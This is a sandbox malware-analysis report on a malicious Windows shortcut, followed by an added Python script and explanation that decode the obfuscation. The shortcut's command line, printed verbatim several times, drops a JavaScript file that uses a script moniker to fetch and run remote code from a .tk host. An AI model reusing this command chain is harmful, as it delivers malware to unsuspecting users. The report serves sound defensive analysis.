File name: aacae30c289ddbd0b94eb283cf4b95f3229bab335702ab1b7f5e73dcbd69b776
Full analysis: https://app.any.run/tasks/80e76c2c-e470-4669-9715-f4d015831416
Verdict: Malicious activity
Analysis date: March 30, 2020, 19:16:46
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Indicators:
MIME: application/octet-stream
File info: MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has command line arguments, Icon number=9, Archive, ctime=Sat Jul 16 12:18:09 2016, mtime=Sat Jul 16 12:18:09 2016, atime=Sat Jul 16 12:18:09 2016, length=202752, window=hidenormalshowminimized
MD5: B9473C7DFF23D94940C78723A0795315
SHA1: 851250E0DF025DA42C7201CE8BFFE5904D17E12A
SHA256: AACAE30C289DDBD0B94EB283CF4B95F3229BAB335702AB1B7F5E73DCBD69B776
SSDEEP: 48:8u61VJ6VTN2ZjBPUR2sHfu5f6eYDynol5xTG5:8X1XOEj/6eYDynf

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided as-is for user acknowledgement. ANY.RUN does not guarantee the maliciousness or safety of the content.
  • MALICIOUS
    • Changes settings of System certificates: WScript.exe (PID: 1232)
  • SUSPICIOUS
    • Application launched itself: cmd.exe (PID: 3364)
    • Executes scripts: explorer.exe (PID: 2724)
    • Executed via COM: explorer.exe (PID: 2724)
    • Reads Internet Cache Settings: WScript.exe (PID: 1232)
    • Starts CMD.EXE for commands execution: cmd.exe (PID: 3364)
    • Adds / modifies Windows certificates: WScript.exe (PID: 1232)
  • INFO
    No info indicators.
No Malware configuration.

TRiD
.lnk | Windows Shortcut (100)

EXIF (LNK)

Flags: IDList, LinkInfo, Description, RelativePath, CommandArgs, IconFile, Unicode, ExpString
FileAttributes: Archive
CreateDate: 2016:07:16 15:18:09+02:00
AccessDate: 2016:07:16 15:18:09+02:00
ModifyDate: 2016:07:16 15:18:09+02:00
TargetFileSize: 202752
IconIndex: 9
RunWindow: Show Minimized No Activate
HotKey: (none)
TargetFileDOSName: cmd.exe
DriveType: Fixed Disk
VolumeLabel: Windows
LocalBasePath: C:\Windows\System32\cmd.exe
Description: 996396872772317611871
RelativePath: ..\..\..\..\..\..\Windows\System32\cmd.exe
CommandLineArguments: /c "sET ULK=ExpNYERTLoNYERTRENYERTr /NYERTc,NYERT&&sET SHN=GeIQVCXItOIQVCXIbjIQVCXIecIQVCXIt(IQVCXI'sIQVCXIcrIQVCXIipIQVCXIt:HIQVCXITtIQVCXIpS:IQVCXI&&sET cv2udHx=1NAWY1NAWYa6hbtfba8s.capanha01v4h6m7.tk1NAWY?011NAWY')&&sEt/^p ltaHcu6="%SHN:IQVCXI=%%cv2udHx:1NAWY=/%"<nul > C:\Users\Public\2iehhnh.js|md ^\ ^||>nul >nul exPlOreR /c, C:\Users\Public\2iehhnh.js|>nul >nul >nul >nul >nul exit|>nul >nul echo DYRXS6IR3DSZE74IKXJ7QFQMH6E9NMH6I6IBH6UDIMJ8U0YBI6L0YBM429LIMFIILIVDG8KCBJL2ICBS7TAJIS6EDICF6LHIMIIL0YBJ53HLCV2IILCBDH8HNBJL9WCBS6KWJIJ6KDFX46LHSXEIKHSXJ5"
IconFileName: %SystemRoot%\system32\shell32.dll
MachineID: ns571773
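The CommandLineArguments field above is the whole delivery chain. It is obfuscated with cmd.exe's `%VAR:old=new%` substring substitution: three variables are assigned junk-padded strings, then `set /p VAR="..." <nul > file` writes the expanded prompt (with no trailing newline) to C:\Users\Public\2iehhnh.js. The references are left unexpanded by the parent cmd.exe because, on a `cmd /c` command line, an undefined variable reference stays literal; the child cmd.exe spawned for the pipe (PID 1084 in the process list, which still shows `%SHN:IQVCXI=%%cv2udHx:1NAWY=/%` verbatim) expands them after the `set` commands have run. The decoder below is an added example, not part of the ANY.RUN report; the command line is copied verbatim from the report, while the expansion rules are this example's own model of cmd.exe behaviour and the function names are its own. Removing `IQVCXI` from SHN and turning `1NAWY` into `/` in cv2udHx yields `GetObject('script:HTtpS://a6hbtfba8s.capanha01v4h6m7.tk/?01/')`, a script-moniker call that pulls a remote scriptlet from the same host the report shows in the DNS and TCP 443 entries.

```python
"""Decode the cmd.exe variable-substitution obfuscation in the .lnk above.

Added example, not part of the ANY.RUN report. LNK_ARGS is copied verbatim
from the CommandLineArguments field; the expansion rules below are this
example's own model of cmd.exe behaviour (an assumption, not the report's).
"""
import hashlib
import re

# Copied verbatim from the CommandLineArguments field of the .lnk in the report.
LNK_ARGS = r'''/c "sET ULK=ExpNYERTLoNYERTRENYERTr /NYERTc,NYERT&&sET SHN=GeIQVCXItOIQVCXIbjIQVCXIecIQVCXIt(IQVCXI'sIQVCXIcrIQVCXIipIQVCXIt:HIQVCXITtIQVCXIpS:IQVCXI&&sET cv2udHx=1NAWY1NAWYa6hbtfba8s.capanha01v4h6m7.tk1NAWY?011NAWY')&&sEt/^p ltaHcu6="%SHN:IQVCXI=%%cv2udHx:1NAWY=/%"<nul > C:\Users\Public\2iehhnh.js|md ^\ ^||>nul >nul exPlOreR /c, C:\Users\Public\2iehhnh.js|>nul >nul >nul >nul >nul exit|>nul >nul echo DYRXS6IR3DSZE74IKXJ7QFQMH6E9NMH6I6IBH6UDIMJ8U0YBI6L0YBM429LIMFIILIVDG8KCBJL2ICBS7TAJIS6EDICF6LHIMIIL0YBJ53HLCV2IILCBDH8HNBJL9WCBS6KWJIJ6KDFX46LHSXEIKHSXJ5"'''


def cmd_substitute(value: str, old: str, new: str) -> str:
    """Emulate %VAR:old=new%: cmd replaces every occurrence of `old`, case-insensitively."""
    return re.sub(re.escape(old), lambda _m: new, value, flags=re.I)


def parse_sets(cmdline: str) -> dict:
    """Collect `set NAME=value` assignments; cmd takes the value up to the next & operator."""
    return {name.upper(): value
            for name, value in re.findall(r'\bset\s+(\w+)=([^&]*)', cmdline, flags=re.I)}


_VAR_REF = re.compile(r'%(?P<name>\w+)(?::(?P<old>[^=%]+)=(?P<new>[^%]*))?%')


def expand(text: str, env: dict) -> str:
    """Expand %VAR% and %VAR:old=new% against env.

    On a `cmd /c` command line (unlike inside a batch file) a reference to an
    undefined variable is left as literal text. That is what lets the parent
    cmd.exe hand %SHN:IQVCXI=% unexpanded to the child it spawns for the pipe
    (PID 1084 in the report), which expands it once `set` has run.
    """
    def repl(m: re.Match) -> str:
        value = env.get(m.group('name').upper())
        if value is None:
            return m.group(0)
        if m.group('old') is not None:
            value = cmd_substitute(value, m.group('old'), m.group('new'))
        return value
    return _VAR_REF.sub(repl, text)


def set_p_payload(cmdline: str, env: dict) -> str:
    """Text that `set /p VAR="..." <nul > file` writes: the expanded prompt, no newline."""
    m = re.search(r'set/\^?p\s+\w+="([^"]*)"', cmdline, flags=re.I)
    if m is None:
        raise ValueError('no set /p found in command line')
    return expand(m.group(1), env)


def decode_lnk(cmdline: str = LNK_ARGS) -> dict:
    """Recover the dropped file's path and content and the URL the payload loads."""
    env = parse_sets(cmdline)
    payload = set_p_payload(cmdline, env)
    path = re.search(r'>\s*(\S+\.js)', cmdline).group(1)
    url = re.search(r"script:(\S+?)'", payload, flags=re.I).group(1)
    return {
        'env': env,
        'dropped_path': path,
        'dropped_content': payload,
        # Compare against the MD5 the report lists for the dropped 2iehhnh.js.
        'dropped_md5': hashlib.md5(payload.encode()).hexdigest().upper(),
        'url': url,
    }


if __name__ == '__main__':
    for key, value in decode_lnk().items():
        print(f'{key}: {value}')
```

The decoded URL is the host in the report's DNS requests and the 104.31.90.111:443 connection, and `dropped_md5` can be checked against the hash listed for C:\Users\Public\2iehhnh.js under Dropped files. The ULK variable (which decodes to `ExpLoREr /c,`) is never referenced; the command line calls `exPlOreR /c, C:\Users\Public\2iehhnh.js` directly, so explorer.exe opens the .js path through the shell and the COM-activated explorer instance (PID 2724, `-Embedding`) launches WScript.exe, which is why the report tags it "Executed via COM". The trailing `md \ ||`, `exit` and `echo` stages only consume the pipe and the junk string.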
Total processes: 42
Monitored processes: 8
Malicious processes: 3
Suspicious processes: 0


Process information

PID 3364
CMD: "C:\Windows\System32\cmd.exe" /c "sET ULK=ExpNYERTLoNYERTRENYERTr /NYERTc,NYERT&&sET SHN=GeIQVCXItOIQVCXIbjIQVCXIecIQVCXIt(IQVCXI'sIQVCXIcrIQVCXIipIQVCXIt:HIQVCXITtIQVCXIpS:IQVCXI&&sET cv2udHx=1NAWY1NAWYa6hbtfba8s.capanha01v4h6m7.tk1NAWY?011NAWY')&&sEt/^p ltaHcu6="%SHN:IQVCXI=%%cv2udHx:1NAWY=/%"<nul > C:\Users\Public\2iehhnh.js|md ^\ ^||>nul >nul exPlOreR /c, C:\Users\Public\2iehhnh.js|>nul >nul >nul >nul >nul exit|>nul >nul echo DYRXS6IR3DSZE74IKXJ7QFQMH6E9NMH6I6IBH6UDIMJ8U0YBI6L0YBM429LIMFIILIVDG8KCBJL2ICBS7TAJIS6EDICF6LHIMIIL0YBJ53HLCV2IILCBDH8HNBJL9WCBS6KWJIJ6KDFX46LHSXEIKHSXJ5"
Path: C:\Windows\System32\cmd.exe
Parent process: explorer.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows Command Processor
Exit code: 0
Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)

PID 1084
CMD: C:\Windows\system32\cmd.exe /S /D /c" sEt/p ltaHcu6="%SHN:IQVCXI=%%cv2udHx:1NAWY=/%" 0<nul 1>C:\Users\Public\2iehhnh.js"
Path: C:\Windows\system32\cmd.exe
Parent process: cmd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows Command Processor
Exit code: 1
Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)

PID 3872
CMD: C:\Windows\system32\cmd.exe /S /D /c" md \ |"
Path: C:\Windows\system32\cmd.exe
Parent process: cmd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows Command Processor
Exit code: 1
Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)

PID 1024
CMD: exPlOreR /c, C:\Users\Public\2iehhnh.js
Path: C:\Windows\explorer.exe
Parent process: cmd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows Explorer
Exit code: 1
Version: 6.1.7600.16385 (win7_rtm.090713-1255)

PID 3576
CMD: C:\Windows\system32\cmd.exe /S /D /c" exit 1>nul"
Path: C:\Windows\system32\cmd.exe
Parent process: cmd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows Command Processor
Exit code: 0
Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)

PID 2688
CMD: C:\Windows\system32\cmd.exe /S /D /c" echo DYRXS6IR3DSZE74IKXJ7QFQMH6E9NMH6I6IBH6UDIMJ8U0YBI6L0YBM429LIMFIILIVDG8KCBJL2ICBS7TAJIS6EDICF6LHIMIIL0YBJ53HLCV2IILCBDH8HNBJL9WCBS6KWJIJ6KDFX46LHSXEIKHSXJ5 1>nul"
Path: C:\Windows\system32\cmd.exe
Parent process: cmd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows Command Processor
Exit code: 0
Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)

PID 2724
CMD: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
Path: C:\Windows\explorer.exe
Parent process: svchost.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows Explorer
Exit code: 1
Version: 6.1.7600.16385 (win7_rtm.090713-1255)

PID 1232
CMD: "C:\Windows\System32\WScript.exe" "C:\Users\Public\2iehhnh.js"
Path: C:\Windows\System32\WScript.exe
Parent process: explorer.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Microsoft ® Windows Based Script Host
Exit code: 0
Version: 5.8.7600.16385
Total events: 3 744
Read events: 179
Write events: 0
Delete events: 0

Modification events: no data

Executable files: 0
Suspicious files: 2
Text files: 1
Unknown types: 1

Dropped files

PID 1232, WScript.exe
  C:\Users\admin\AppData\Local\Temp\CabD421.tmp
  MD5 / SHA256: not listed in the report

PID 1232, WScript.exe
  C:\Users\admin\AppData\Local\Temp\TarD422.tmp
  MD5 / SHA256: not listed in the report

PID 1232, WScript.exe
  C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_74167E25E5476CCA2A5946AAA61BF9E1 (binary)
  MD5: F350048EC59AF23FF6480A61193CAA4D
  SHA256: 4ABEE9E318CA036FF4082416825973B7D71E6285B8915CCEB5F6D794417D7DBE

PID 1232, WScript.exe
  C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_74167E25E5476CCA2A5946AAA61BF9E1 (der)
  MD5: 907131A56BA168672FD6DCA3988E2A2B
  SHA256: 7A4D281C2E93B883F2A05E43F75A91BCA5F83FB3F1FE3AC84FDA45D6146BAB05

PID 1084, cmd.exe
  C:\Users\Public\2iehhnh.js (text)
  MD5: 26EC1B624C95FFA53EDD2658DB234DB6
  SHA256: 834A0E8586C365FB08DFB537FC2EF0CBDF036CA108313E164CDDA6F9A24F83CB
HTTP(S) requests: 0
TCP/UDP connections: 2
DNS requests: 2
Threats: 0

HTTP requests: none

Connections

PID 1232, WScript.exe -> 93.184.220.29:80 (ocsp.digicert.com), ASN: MCI Communications Services, Inc. d/b/a Verizon Business, country: US, reputation: whitelisted
PID 1232, WScript.exe -> 104.31.90.111:443 (a6hbtfba8s.capanha01v4h6m7.tk), ASN: Cloudflare Inc, country: US, reputation: shared

DNS requests

a6hbtfba8s.capanha01v4h6m7.tk -> 104.31.90.111, 104.31.91.111 (reputation: unknown)
ocsp.digicert.com -> 93.184.220.29 (reputation: whitelisted)

Threats

Class: Potentially Bad Traffic
Message: ET DNS Query to a .tk domain - Likely Hostile
(PID and process not listed in the report)

Debug info: none